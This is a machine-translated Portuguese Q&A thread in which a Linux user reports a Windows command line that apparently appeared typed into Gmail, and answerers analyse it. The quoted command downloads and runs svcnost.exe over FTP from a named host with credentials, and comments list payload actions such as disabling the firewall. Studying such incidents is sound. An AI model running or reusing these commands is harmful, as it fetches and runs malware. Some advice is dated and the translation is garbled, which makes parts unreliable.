Questão Como identificar se meu computador Linux foi hackeado?


Meu PC doméstico está normalmente ligado, mas o monitor está desligado. Esta noite eu cheguei em casa do trabalho e descobri o que parece ser uma tentativa de hackear: no meu navegador, meu Gmail estava aberto (era eu), mas estava no modo de composição com o seguinte no TO campo:

md / c echo open ccleamFtp.yi.org 21 >> ik e echo user ccteam10 765824 >> ik e eco binário >> ik & echo obter svcnost.exe >> ik & echo bye >> ik e ftp -n -v -s: ik e del ik & svcnost.exe e sair   eco Você foi possuído

Isso parece com código de linha de comando do Windows para mim, eo md início do código combinado com o fato de que o Gmail estava no modo de composição, torna evidente que alguém tentou executar um cmd comando. Acho que tive sorte de não executar o Windows neste PC, mas tenho outros que fazem isso. Esta é a primeira vez que algo assim aconteceu comigo. Eu não sou um guru do Linux e não estava executando nenhum outro programa além do Firefox na época.

Tenho certeza de que não escrevi isso e ninguém mais estava fisicamente no meu computador. Além disso, recentemente mudei minha senha do Google (e todas as minhas outras senhas) para algo como vMA8ogd7bv então eu não acho que alguém invadiu minha conta do Google.

O que acabou de acontecer? Como alguém coloca as teclas digitadas no meu computador quando não é a velha máquina Windows da vovó que está executando malware há anos, mas uma nova instalação recente do Ubuntu?

Atualizar:
Deixe-me abordar alguns dos pontos e perguntas:

  • Estou na Áustria, no campo. Meu roteador WLAN é executado WPA2/PSK e uma senha média forte que não está no dicionário; teria que ser força bruta e menos de 50 metros daqui; Não é provável que tenha sido hackeado.
  • Eu estou usando um teclado com fio USB, então, novamente, é muito improvável que alguém possa estar dentro do alcance para hackeá-lo.
  • Eu não estava usando meu computador na época; foi apenas em casa enquanto eu estava no trabalho. É um PC nettop montado no monitor, então eu raramente o desligo.
  • A máquina tem apenas dois meses, só roda o Ubuntu, e eu não estou usando software estranho ou visitando sites estranhos. É principalmente Stack Exchange, Gmail e jornais. Sem jogos. O Ubuntu está pronto para se manter atualizado.
  • Não tenho conhecimento de nenhum serviço VNC em execução; Eu certamente não instalei ou habilitei um. Eu também não iniciei nenhum outro servidor. Não tenho certeza se algum está sendo executado no Ubuntu por padrão?
  • Conheço todos os endereços IP da atividade da conta do Gmail. Tenho quase certeza de que o Google não é uma entrada.
  • Achei um Visualizador de arquivos de log, mas não sei o que procurar. Socorro?

O que eu realmente quero saber é, e o que realmente me faz sentir inseguro é: Como alguém da Internet pode gerar pressionamentos de tecla na minha máquina? Como posso evitar isso sem ser todo o papel-alumínio? Eu não sou um geek do Linux, eu sou um pai que mexeu com o Windows por mais de 20 anos e estou cansado disso. E em todos os 18 anos de estar on-line, eu nunca vi qualquer tentativa de hack, então isso é novo para mim.


126


origem


Alguém mais teve acesso ao seu computador ou você tem um teclado sem fio muito antigo? Além disso, o Ubuntu possui um servidor VNC embutido. Se isso é ativo, um script aleatório em algum lugar poderia ter conectado e assumido que era um computador windows, enviando as teclas WIN + R, cmd ...... - TuxRug
@torbengb: sua postagem realmente me assusta... - Mehrdad
Existem outros computadores na sua rede sem fio? Se o intruso quebrou deles segurança lhe daria um "in" à sua rede local, o que poderia levar a quebrar a caixa do Ubuntu de várias maneiras. - CarlF
@muntoo ... e tenho certeza que você não escreveu isso em nenhum lugar e não usa nenhum aplicativo para gerenciá-los, certo? Não vamos começar a atacar com senha; pelo menos minha senha não é password :-) - Torben Gundtofte-Bruun
Você tem um gato? - Zaki


Respostas:


Eu duvido que você tenha alguma coisa com que se preocupar. Era mais do que provável que um ataque de JavaScript que tentou fazer um dirigir por download. Se você está preocupado com isso, comece a usar NoScript e AdBlock Plus Complementos do Firefox.

Mesmo visitando sites confiáveis, você não está seguro porque eles executam código JavaScript de anunciantes de terceiros que podem ser mal-intencionados.

Eu peguei e corri em uma VM. Ele instalou o mirc e este é o log de status ... http://pastebin.com/Mn85akMk

É um ataque automatizado que está tentando levá-lo a baixar o mIRC e se juntar a um botnet que vai transformá-lo em um spambot ... Ele tinha minha VM se juntar e fazer uma conexão com um número de endereços remotos diferentes, um dos quais é autoemail-119.west320.com.

Executá-lo no Windows 7 eu tive que aceitar o prompt do UAC e permitir o acesso através do firewall.

Parece haver toneladas de relatórios desse comando exato em outros fóruns, e alguém até mesmo diz que um arquivo torrent tentou executá-lo quando terminou o download ... Eu não sei como isso seria possível.

Eu não usei isso sozinho, mas ele deve ser capaz de mostrar as conexões de rede atuais para que você possa ver se está conectado a algo fora da norma: http://netactview.sourceforge.net/download.html


66



Er, por que todos os comentários (mesmo o altamente altamente relevante aqueles que descobriram que o script tentou abrir um cmd janela) excluído !? - BlueRaja - Danny Pflughoeft
Eu estaria tão seguro desse tipo de ataque se eu começasse a usar o uBlock Origin? - RobotUnderscore


Eu concordo com @ jb48394 que é provavelmente uma exploração de JavaScript, como tudo mais nos dias de hoje.

O fato de que ele tentou abrir um cmd janela (Vejo @ comentário de torbengb) e executar um comando malicioso, em vez de apenas baixar o cavalo de tróia discretamente em segundo plano, sugere que ele explora alguma vulnerabilidade no Firefox que permite inserir traços-chave, mas não executar código.

Isso também explica por que essa exploração, que foi claramente escrito exclusivamente para o Windows, também funcionaria no Linux: O Firefox roda o JavaScript da mesma maneira em todos os sistemas operacionais  (pelo menos, tenta :)). Se fosse causado por um buffer-overflow ou exploit similar destinado ao Windows, ele teria simplesmente deixado de funcionar no programa.

Quanto ao local de origem do código JavaScript, provavelmente um anúncio malicioso do Google (ciclo de anúncios no Gmail ao longo do dia). isto não faria  estar  a  primeiro  Tempo.


41



Referências agradáveis. - kizzx2
FYI para skimmers, esse último "link" é na verdade cinco links separados. - Pops
Seria muito chocante se fosse uma exploração de Javascript, pois meu Firefox normalmente fica aberto por dias. No entanto, você precisa chamar uma API especial para enviar chaves para outro sistema no Windows e, provavelmente, uma chamada de sistema diferente (se existir) no Linux. Como o envio de teclas não é uma operação normal do Javascript, duvido que o Firefox implemente uma chamada multiplataforma para isso. - billc.cn
@ billc.cn: Acredito que escrevendo para o buffer de teclado PS / 2 funciona da mesma forma, independentemente do sistema operacional. - BlueRaja - Danny Pflughoeft


eu encontrei um ataque similar em outra máquina Linux. Parece que é algum tipo de comando FTP para o Windows.


12



Mais precisamente, ele baixa e executa o arquivo ftp://ccteam10:765824@cCTeamFtp.yi.org/svcnost.exe usando o Windows ftp ferramenta de linha de comando. - grawity
encontrei-o em pastebin também pastebin.com/FXwRpKH4 - Shekhar
aqui está a informação sobre o site whois.domaintools.com/216.210.179.67 - Shekhar
É um pacote WinRAR SFX contendo uma instalação mIRC portátil e um arquivo chamado "DriverUpdate.exe". DriverUpdate.exe executa (pelo menos) dois comandos shell: netsh firewall set opmode disable e taskkill / F / IM VCSPAWN.EXE / T Ele também tenta (eu acho) adicionar die-freesms-seite.com à zona confiável do Internet Explorer e ao desvio de proxy. - Andrew Lambert


Isso não responde a toda a sua pergunta, mas no arquivo de log procure por tentativas de logon com falha.

Se houver mais de cinco tentativas fracassadas no seu log, alguém tentou quebrar root. Se houver uma tentativa bem-sucedida de fazer logon no root enquanto você estava longe do seu computador, MUDE SUA SENHA IMEDIATAMENTE !! Eu quero dizer agora! De preferência para algo alfanumérico e cerca de 10 caracteres de comprimento.

Com as mensagens que você recebeu (o echocomandos) isso realmente soa como alguns imaturo roteiro infantil. Se foi um verdadeiro hacker que sabe o que estava fazendo, você provavelmente ainda não saberia disso.


5



Eu concordo que isso foi evidentemente muito amador. Pelo menos eles não deveriam ter colocado eco você foi possuído no fim. Me faz pensar se algum "verdadeiro hacker" já passou? Ou talvez eu deva estar perguntando, quantos? - Torben Gundtofte-Bruun
@torgengb: se o comando fosse executado em um prompt de comando do windows, você não veria o eco (por causa do &exit) - BlueRaja - Danny Pflughoeft


whois relatórios west320.com é de propriedade da Microsoft.

UPnP e Vino (Sistema -> Preferências -> Área de Trabalho Remota) combinado com uma senha fraca do Ubuntu?

Você usou algum repositório não padrão?

DEF CON tem uma competição Wi-Fi a cada ano sobre a distância que um ponto de acesso Wi-Fi pode ser alcançado - o último que ouvi foi 250 milhas.

Se você realmente quiser ter medo, veja as imagens de um centro de comando-n-controle de um Botnet Zeus. Nenhuma máquina é segura, mas o Firefox no Linux é mais seguro que o resto. Melhor ainda, se você correr SELinux.


-1



O autor desta façanha claramente não tinha intenção de executar isso no Linux, então duvido que tenha algo a ver com um utilitário gnome vulnerável ou com uma senha fraca (também, OP já mencionado, ele tem uma senha segura) - BlueRaja - Danny Pflughoeft
Na verdade, ele não menciona ter uma senha do Ubuntu, apenas uma senha do gmail e wireless. Um garoto executando metasploit pode nem saber sobre o Linux, ele só vê VNC. É mais provável que seja um ataque de javascript. - rjt